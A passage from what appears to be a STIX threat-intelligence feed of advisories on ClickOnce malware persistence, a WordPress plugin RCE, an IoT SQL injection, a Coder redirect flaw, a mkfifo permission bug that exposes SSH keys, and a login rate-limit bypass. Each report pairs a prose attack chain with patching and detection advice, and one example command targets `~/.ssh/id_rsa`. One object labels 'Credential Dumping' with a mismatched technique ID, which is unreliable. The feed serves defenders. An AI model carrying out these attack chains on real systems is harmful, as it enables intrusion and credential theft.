      "description": "## Overview\n\nCrowdStrike has observed a new abuse of Microsoft's ClickOnce technology by threat actors to facilitate initial access, execute malicious payloads, and establish persistence on target systems. Beginning as early as June 2026, this technique exploits the inherent user-friendliness and low-privilege requirements of ClickOnce application deployment, often bypassing traditional security controls like email filtering. Threat actors deliver malicious `.application` files, leveraging user unfamiliarity with ClickOnce installations to trick victims into executing malware. Once deployed, these applications run within legitimate Microsoft processes such as `rundll32.exe` and `dfsvc.exe`, enhancing stealth. Persistence is achieved by placing `.appref-ms` files in the Windows Startup folder or registering them as scheduled tasks, ensuring malware re-execution. The built-in update mechanism of ClickOnce further allows attackers to update their malware, change command and control (C2) infrastructure, or facilitate lateral movement, creating a highly potent and stealthy attack vector for remote access and data exfiltration.\n\n## Attack Chain\n\n1.  **Initial Access**: Threat actors send phishing emails containing links or direct users to malicious websites that prompt them to \"click a button\" for a supposed application or document.\n2.  **Delivery**: The user clicks the link, triggering the download and execution of a malicious `.application` file (a ClickOnce deployment manifest).\n3.  **Execution**: The ClickOnce runtime components, specifically `dfsvc.exe` (Deployment Services) and `rundll32.exe`, legitimately process the `.application` file and execute the embedded malicious payload without requiring administrator privileges.\n4.  **Payload Deployment**: The malicious ClickOnce application installs its payload (e.g., a backdoor, infostealer, or remote access tool) onto the system, often in user-writable ClickOnce application cache directories like `%LOCALAPPDATA%\\Apps\\2.0\\`.\n5.  **Persistence via Startup Folder**: To maintain access, the attacker places the malicious application's `.appref-ms` shortcut file directly into the user's Windows Startup folder (`%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`).\n6.  **Persistence via Scheduled Task**: Alternatively, the attacker creates a Scheduled Task to regularly execute the malicious ClickOnce application by referencing its `.appref-ms` file, ensuring repeated execution upon system events or specific intervals.\n7.  **Command and Control / Updates**: The malicious ClickOnce application uses its built-in update mechanism to communicate with a threat actor-controlled server, fetching new components, receiving updated instructions, or changing C2 infrastructure for continued remote access.\n8.  **Impact**: The attacker achieves persistent remote access, enabling further actions such as data exfiltration, lateral movement, or the deployment of additional malware like ransomware.\n\n## Impact\n\nThis ClickOnce abuse creates a significant impact by bypassing common enterprise security mechanisms due to its reliance on legitimate Microsoft technology and minimal user interaction. Organizations targeted may experience unauthorized access, data exfiltration, and persistent footholds for threat actors without requiring elevated privileges. The stealthy execution within trusted Microsoft processes makes detection challenging, leading to prolonged compromise and potentially significant financial and reputational damage. The lack of user awareness regarding ClickOnce installations also makes users highly susceptible to social engineering, contributing to a high success rate for initial access.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious ClickOnce activity.\n*   Configure endpoint detection and response (EDR) solutions to monitor `dfsvc.exe` for unusual child process creation, especially scripting engines, as covered by \"Detect ClickOnce Deployment Service (dfsvc.exe) Spawning Scripting/Shell Processes\".\n*   Enhance file integrity monitoring and process creation logging to detect the creation of `.appref-ms` files in user Startup folders, specifically addressing the behavior described in \"Detect ClickOnce Persistence via Startup Folder\".\n*   Educate users about the risks associated with installing software from untrusted sources, even if it appears to be a \"one-click\" installation, emphasizing the dangers of `.application` files.\n*   Implement application whitelisting or strict software restriction policies to prevent the execution of applications from user-writable directories like `AppData` where ClickOnce applications are commonly installed.\n",
      "published": "2026-07-07T15:05:24Z",
      "labels": [
        "clickonce",
        "persistence",
        "initial-access",
        "defense-evasion",
        "remote-access",
        "microsoft",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--5e05d029-d159-5289-9f03-3641066e4011",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--98ecbfc2-7fe9-5608-8655-da8f969677dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--16ce0e57-b398-53bc-843f-938663a25cd8",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7fc8d5c6-2a71-581a-9e48-40a8e95df84d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--16ce0e57-b398-53bc-843f-938663a25cd8",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--16ce0e57-b398-53bc-843f-938663a25cd8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14345: Unauthenticated Remote Code Execution in WPFunnels WordPress Plugin",
      "description": "## Overview\n\nA critical unauthenticated Remote Code Execution (RCE) vulnerability, tracked as CVE-2026-14345, has been identified in the WPFunnels – Funnel Builder for WooCommerce with Checkout \u0026 One Click Upsell plugin for WordPress, impacting all versions up to and including 3.12.7. This flaw allows unauthenticated attackers to execute arbitrary code on the server by exploiting an unsanitized write of attacker-controlled data from the 'postData' parameter into a PHP-includeable `.log` file. The vulnerability is triggered when an administrator subsequently views the polluted log file via the plugin's Log Settings View UI, leading to the execution of the injected code via `include_once`. While this requires the \"Enable Logs\" setting to be active and an administrator viewing the log, the nonce needed for the initial injection step is publicly exposed on every funnel step page, making the initial code injection fully unauthenticated.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a WordPress site utilizing a vulnerable version (\u003c= 3.12.7) of the WPFunnels plugin, where the \"Enable Logs\" setting is active.\n2.  The attacker accesses any publicly available funnel step page on the target WordPress site to harvest the nonce, which is publicly emitted and required for the next step.\n3.  The attacker crafts a malicious HTTP POST request targeting the plugin's \"optin endpoint,\" embedding PHP code within the 'postData' parameter, along with the previously retrieved nonce.\n4.  Due to improper input sanitization, the vulnerable WPFunnels plugin writes the attacker-controlled 'postData', including the malicious PHP code, directly into a PHP-includeable `.log` file on the web server's filesystem.\n5.  An administrator of the WordPress site later navigates to the WPFunnels plugin's Log Settings View UI within the WordPress administrative dashboard, potentially for routine monitoring or troubleshooting.\n6.  Upon viewing the logs, the plugin's `wpfnl_show_log` function uses `include_once` to render the content of the polluted `.log` file.\n7.  The `include_once` call executes the malicious PHP code previously injected by the attacker, leading to unauthenticated Remote Code Execution on the underlying web server.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14345 results in unauthenticated Remote Code Execution (RCE) on the vulnerable WordPress web server. This provides attackers with full control over the compromised server, enabling them to deface the website, inject malware, exfiltrate sensitive data, establish persistence, or use the server as a pivot point for further attacks on the internal network. The CVSS v3.1 base score of 9.8 indicates a critical severity, highlighting the ease of exploitation and significant potential for damage, impacting any organization running the affected plugin versions.\n\n## Recommendation\n\n*   Patch CVE-2026-14345 immediately by updating the \"WPFunnels – Funnel Builder for WooCommerce with Checkout \u0026 One Click Upsell plugin\" to a version greater than 3.12.7.\n*   Review WordPress `webserver` access logs for unusual POST requests targeting plugin-related \"optin endpoints\" that might contain suspicious data in the request body, indicating exploitation attempts for CVE-2026-14345.\n*   Monitor file integrity and changes within the `wp-content/plugins/wpfunnels/` directory, specifically looking for unexpected modifications or creations of `.log` or `.php` files.\n*   If the plugin's \"Enable Logs\" setting is not essential for operational requirements, consider disabling it to eliminate the log file pollution vector associated with CVE-2026-14345.\n",
      "published": "2026-07-07T06:22:20Z",
      "labels": [
        "web-exploit",
        "rce",
        "wordpress",
        "plugin-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-14345"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--61464e64-fa35-5d13-83cc-a107028253db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4f436a8c-609e-5189-b523-922c6f4e1eee",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4f436a8c-609e-5189-b523-922c6f4e1eee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "OpenRemote Authenticated SQL Injection via Datapoint Crosstab Export",
      "description": "## Overview\n\nOpenRemote, an IoT solution platform, contains a critical authenticated SQL injection vulnerability in its datapoint export API, specifically within the crosstab export functionality. An attacker, requiring a valid authenticated session with permissions to create or rename assets and export their datapoints, can manipulate asset names to inject arbitrary SQL. This flaw stems from the application's practice of concatenating user-controlled asset display names directly into PostgreSQL `COPY` queries without proper escaping. The injected SQL is executed against the backend database, and its results are included within the legitimate ZIP/CSV export response, allowing for data exfiltration. This vulnerability, affecting `openremote-manager` versions prior to 1.26.0, poses a significant risk, particularly in multi-tenant environments where it could lead to unauthorized access and exfiltration of sensitive information across different tenants.\n\n## Attack Chain\n\n1.  An attacker obtains a valid authenticated session within the OpenRemote platform.\n2.  The attacker uses their permissions to create a new asset or rename an existing one, embedding SQL metacharacters and desired injection payload into the asset's name.\n3.  The attacker ensures this crafted asset has at least one exportable datapoint attribute, potentially writing a value to it if needed.\n4.  The attacker initiates a CSV crosstab datapoint export request for the attribute associated with the specially crafted asset.\n5.  The OpenRemote backend constructs a PostgreSQL `COPY` query, embedding the attacker-controlled asset name into SQL contexts without sufficient escaping.\n6.  The database executes the malformed query, including the attacker's injected SQL statements (e.g., `SELECT` statements).\n7.  The results of the injected `SELECT` query, along with normal datapoint data, are streamed back to the attacker within the exported CSV file contained in the ZIP response.\n8.  The attacker extracts sensitive database information, such as `current_user`, `current_database()`, and `count(*)` from other tables, effectively exfiltrating data.\n\n## Impact\n\nThe impact of this vulnerability is significant, particularly due to its high confidentiality risk. An authenticated attacker can exfiltrate arbitrary data from the backend PostgreSQL database. This includes potentially sensitive configuration data, user information, or operational data, and in multi-tenant deployments, it could expose data belonging to other tenants. While integrity and availability impacts were not demonstrated in the proof-of-concept, they remain a possibility depending on the application's database role privileges. The ease of exploitation, requiring only common asset management permissions, makes this a serious threat.\n\n## Recommendation\n\n*   Upgrade OpenRemote `openremote-manager` to version 1.26.0 or newer immediately to mitigate the SQL injection vulnerability as outlined in the `affected_products` section.\n*   Review web application firewall (WAF) rules to detect and block SQL injection patterns in URL parameters or request bodies that target the datapoint export endpoint.\n*   Implement strict input validation and parameterized queries in all application development, especially when handling user-controlled data that might be used in SQL queries, as detailed in the \"Recommended Fix\" section.\n",
      "published": "2026-07-06T21:58:37Z",
      "labels": [
        "sql-injection",
        "data-exfiltration",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-cgfv-jrfp-2r7v"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1b67c310-846d-5868-835b-bb60d208db7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac56170b-fc24-5024-bfd0-f812a30f6c0d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--502d523c-d92c-58ba-8b55-a2331400c591",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac56170b-fc24-5024-bfd0-f812a30f6c0d",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ac56170b-fc24-5024-bfd0-f812a30f6c0d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Coder Workspace Agent API Insecure Redirect Handling Allows Cross-Agent File Access and RCE",
      "description": "## Overview\n\nA critical vulnerability (tracked as GHSA-qrwj-vh9x-gw5v) has been identified in Coder, a developer workspace platform, affecting its workspace agent API's redirect handling. Specifically, the `agentConn.apiClient()` utilized the default redirect behavior of `http.Client`, which could be abused by an authenticated user. By controlling a modified workspace agent, an attacker can craft HTTP redirects (e.g., 307 or 308) to point the control-plane client towards a victim agent's internal tailnet IP address. This bypasses security checks and causes subsequent API requests, intended for the attacker's agent, to be sent to the victim's agent instead. This can lead to unauthorized file reading and writing as the victim workspace user. In affected versions that expose the workspace agent process API, this primitive can be chained to achieve arbitrary command execution, effectively allowing attackers to cross workspace and tenant boundaries. The vulnerability affects Coder versions prior to v2.34.4, v2.33.10, v2.32.9, and v2.29.19 (ESR).\n\n## Attack Chain\n\n1.  An authenticated user gains control over and modifies a Coder workspace agent within their own workspace.\n2.  The attacker, knowing the victim agent's UUID, deterministically calculates the victim agent's tailnet IP address.\n3.  The attacker's modified agent returns an HTTP redirect (e.g., 307 or 308) in response to a control-plane client's API request.\n4.  The crafted redirect's Location header specifies the derived tailnet IP of the victim agent.\n5.  Due to insecure default redirect handling, the control-plane client follows the redirect, sending its subsequent workspace agent API request to the victim agent's IP instead of the intended (attacker's) agent.\n6.  The victim agent, processing the request as if it originated legitimately from the control plane, performs the requested action (e.g., file read or write).\n7.  If the workspace agent process API is exposed, the attacker writes a malicious payload via the redirected file API.\n8.  The attacker then redirects a process-start request to execute the payload, achieving remote command execution as the victim workspace user and crossing workspace/tenant boundaries.\n\n## Impact\n\nSuccessful exploitation allows an authenticated user to gain unauthorized access to files and potentially achieve remote code execution (RCE) on other workspace agents within the Coder environment. This means an attacker can read sensitive files, modify critical data, or execute arbitrary commands as the victim workspace user, effectively compromising other users' workspaces and potentially breaching tenant boundaries. The consequence could range from data exfiltration and sabotage to complete compromise of sensitive development environments, leading to intellectual property theft or further network penetration. The vulnerability requires an authenticated user with control over a modified agent but the impact extends beyond their initial scope.\n\n## Recommendation\n\n*   Upgrade all Coder installations immediately to a patched version: v2.34.4, v2.33.10, v2.32.9, or v2.29.19 (ESR) or later, as specified in the provided patches section.\n*   Ensure that Coder instances are updated to address GHSA-qrwj-vh9x-gw5v to disable automatic redirect following for workspace agent API clients.\n*   Confirm that all workspace agent API dials pin to the intended agent's deterministic tailnet address and reject requests whose URL host does not match the intended agent, as described in the fix.\n",
      "published": "2026-07-06T21:57:28Z",
      "labels": [
        "vulnerability",
        "rce",
        "file-manipulation",
        "coder",
        "server-side-request-forgery",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qrwj-vh9x-gw5v"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/coder/coder/pull/26600"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1bed97c-93ec-5d27-8adf-35abb8a945ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--975d74a0-6e65-563a-a953-3deffe7bbfae",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e559d7a6-cefa-5b09-8bbe-67c6b9bf4bf3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Permissions Modification",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1222",
          "url": "https://attack.mitre.org/techniques/T1222"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ddfb6980-2adc-5ee9-b533-c0a5c3fd4822",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--975d74a0-6e65-563a-a953-3deffe7bbfae",
      "target_ref": "attack-pattern--e559d7a6-cefa-5b09-8bbe-67c6b9bf4bf3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--afc41c9d-9543-5bf0-b564-5a5c4e6c70fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--975d74a0-6e65-563a-a953-3deffe7bbfae",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--975d74a0-6e65-563a-a953-3deffe7bbfae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "mkfifo: permissions of an existing file are changed after FIFO creation fails",
      "description": "## Overview\n\nA critical vulnerability (CVE-2026-35341) has been identified in `uu_mkfifo`, a utility within `uutils coreutils`, affecting all versions prior to 0.6.0. The flaw, reported by Zellic during a security assessment for Canonical, occurs when `mkfifo()` is invoked on a path that already exists as a regular file. Instead of simply reporting an error and exiting, the `uu_mkfifo` utility inadvertently proceeds to call `fs::set_permissions` on the pre-existing file. This action modifies the file's permissions to the default FIFO mode (typically `0644`), effectively relaxing previously strict access controls. This vulnerability enables an attacker with local access to inadvertently or maliciously expose sensitive, owner-only files, such as SSH private keys, to other users on the system, leading to unauthorized information disclosure and potential privilege escalation. The issue has been acknowledged and a fix implemented in PR #10376.\n\n## Attack Chain\n\n1. An attacker gains local access to a Linux system running an affected version of `uutils coreutils` (`uu_mkfifo` \u003c 0.6.0).\n2. The attacker identifies a sensitive file with highly restricted permissions, such as an SSH private key (`~/.ssh/id_rsa`), which is typically set to `0600` or `0400`.\n3. The attacker attempts to create a FIFO (named pipe) using the vulnerable `uu_mkfifo` utility, specifying the path of the sensitive file as the target (e.g., `uu_mkfifo ~/.ssh/id_rsa`).\n4. The `mkfifo()` system call invoked by `uu_mkfifo` fails because a file with the specified name (`~/.ssh/id_rsa`) already exists.\n5. Due to a logical error (missing `continue;` statement after the error handling), `uu_mkfifo` incorrectly proceeds to invoke `fs::set_permissions` on the existing sensitive file.\n6. The file's permissions are subsequently changed from their strict original setting (e.g., `0600`) to the default FIFO creation permissions (e.g., `0644`).\n7. The sensitive file, now with relaxed permissions, becomes readable by other unprivileged users on the system.\n8. Other users or processes can now read the contents of the sensitive file (e.g., the SSH private key), leading to unauthorized information disclosure or further credential compromise.\n\n## Impact\n\nThe successful exploitation of CVE-2026-35341 can lead to significant information disclosure and potential privilege escalation on affected Linux systems. An attacker, or even an unsuspecting user, can inadvertently relax file permissions on critical owner-only files, such as SSH private keys, API keys, or configuration files containing credentials. If these files are exposed, unauthorized users could read their contents, enabling lateral movement within the network, unauthorized access to systems, or further credential harvesting. While no specific victim count or targeted sectors have been reported for active exploitation, the coreutils package is fundamental, making a wide range of Linux environments potentially vulnerable.\n\n## Recommendation\n\n*   Immediately patch `uutils coreutils` to version 0.6.0 or later to remediate CVE-2026-35341.\n*   Implement file integrity monitoring (FIM) for sensitive files (e.g., SSH keys, `/etc/shadow`, API keys) to detect unexpected permission changes, which may be logged via `file_event` category logs.\n*   Review process creation logs for `uu_mkfifo` executions (`process_creation` category) targeting existing sensitive files and investigate any subsequent unauthorized permission modifications.\n",
      "published": "2026-07-06T21:56:23Z",
      "labels": [
        "vulnerability",
        "linux",
        "coreutils",
        "permissions",
        "information-disclosure",
        "privilege-escalation"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--e559d7a6-cefa-5b09-8bbe-67c6b9bf4bf3",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-pmf6-rcx4-v53v"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/uutils/coreutils/issues/10020"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Brute Force",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1110",
          "url": "https://attack.mitre.org/techniques/T1110"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--17db19c5-515f-5dd9-8647-0e089fbe5099",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--364e9f95-1e0f-508c-81e6-6381f768511f",
      "target_ref": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--364e9f95-1e0f-508c-81e6-6381f768511f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "9router: Login Brute-Force Protection Bypass via Spoofed X-Forwarded-For Header",
      "description": "## Overview\n\nA high-severity vulnerability (CVE-2026-55501) has been identified in the 9router dashboard, specifically in versions up to and including 0.4.71. This flaw stems from the application's reliance on the attacker-controlled `X-Forwarded-For` HTTP header to determine a client's identity for its login rate-limiting mechanism. When 9router is exposed directly to the internet or deployed behind a reverse proxy that does not properly overwrite untrusted `X-Forwarded-For` headers, a remote attacker can bypass the brute-force protection. By rotating the `X-Forwarded-For` value with each login attempt, the attacker receives a fresh rate-limit bucket, rendering the lockout mechanism ineffective. This enables unlimited password guessing against the dashboard, significantly increasing the risk of unauthorized administrative access, especially if default or weak credentials are in use.\n\n## Attack Chain\n\n1.  A remote attacker identifies a publicly reachable 9router dashboard instance, typically listening on HTTP/S.\n2.  The attacker initiates a series of login attempts by sending HTTP `POST` requests to the `/api/auth/login` endpoint.\n3.  For each login attempt, the attacker crafts a unique and arbitrary `X-Forwarded-For` HTTP header value (e.g., `10.0.0.1`, `10.0.0.2`, `10.0.0.3`).\n4.  The 9router application, due to its vulnerable `getClientIp` function, uses this attacker-controlled `X-Forwarded-For` value as the client identifier for its in-memory rate limiter.\n5.  Each unique `X-Forwarded-For` header creates a new, independent rate-limit bucket for the attacker, effectively resetting the failed attempt counter and bypassing the configured lockout thresholds.\n6.  The attacker continues this process, performing unlimited password guessing against the dashboard login without triggering any lockout, until the correct credentials are found or all possibilities are exhausted.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-55501 allows an attacker to completely bypass the 9router dashboard's login lockout mechanism, enabling unlimited brute-force attempts against user passwords. If the attacker successfully guesses credentials, particularly in instances still using default or weak passwords, they gain administrative access to the 9router dashboard. This administrative access could lead to severe consequences, including the ability to retrieve sensitive configured provider credentials and API keys, modify critical application settings, disable security features, create persistent backdoors via new API keys, or further pivot into other connected systems by chaining with additional server-side functionality exposed by the dashboard.\n\n## Recommendation\n\n*   Immediately patch 9router to a version greater than 0.4.71 to address CVE-2026-55501.\n*   If patching is not immediately possible, ensure that 9router is deployed behind a trusted reverse proxy (e.g., Nginx, Apache, Caddy) that is configured to overwrite or remove untrusted `X-Forwarded-For` headers originating from external networks.\n*   Implement strong, complex, and unique passwords for all 9router dashboard accounts, and enforce multi-factor authentication (MFA) if available, as a layered defense against credential-based attacks.\n*   Deploy the Sigma rule \"Detect 9router Dashboard Brute-Force Attempts\" in this brief to your SIEM to identify sustained failed login activity targeting the `/api/auth/login` endpoint.\n",
      "published": "2026-07-06T21:49:14Z",
      "labels": [
        "brute-force",
        "rate-limit-bypass",
        "x-forwarded-for",
        "vulnerability",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-7cfm-pqrj-xgq7"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--950ac136-46af-5c3c-b9b3-e292f5acc80e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://localhost:20128/api/settings/database",
      "pattern": "[url:value = 'http://localhost:20128/api/settings/database']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T21:43:46Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a5a7212-da81-50bf-b28f-fa5e9fb8645f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4fdf41d-e93e-5e7e-b150-7711d43bd031",
      "target_ref": "indicator--950ac136-46af-5c3c-b9b3-e292f5acc80e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f099740e-4acc-511b-9a07-8c7c5562ae2f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4fdf41d-e93e-5e7e-b150-7711d43bd031",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Credential Dumping",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1bc50008-30e6-5027-9af3-0cff58901754",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d4fdf41d-e93e-5e7e-b150-7711d43bd031",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
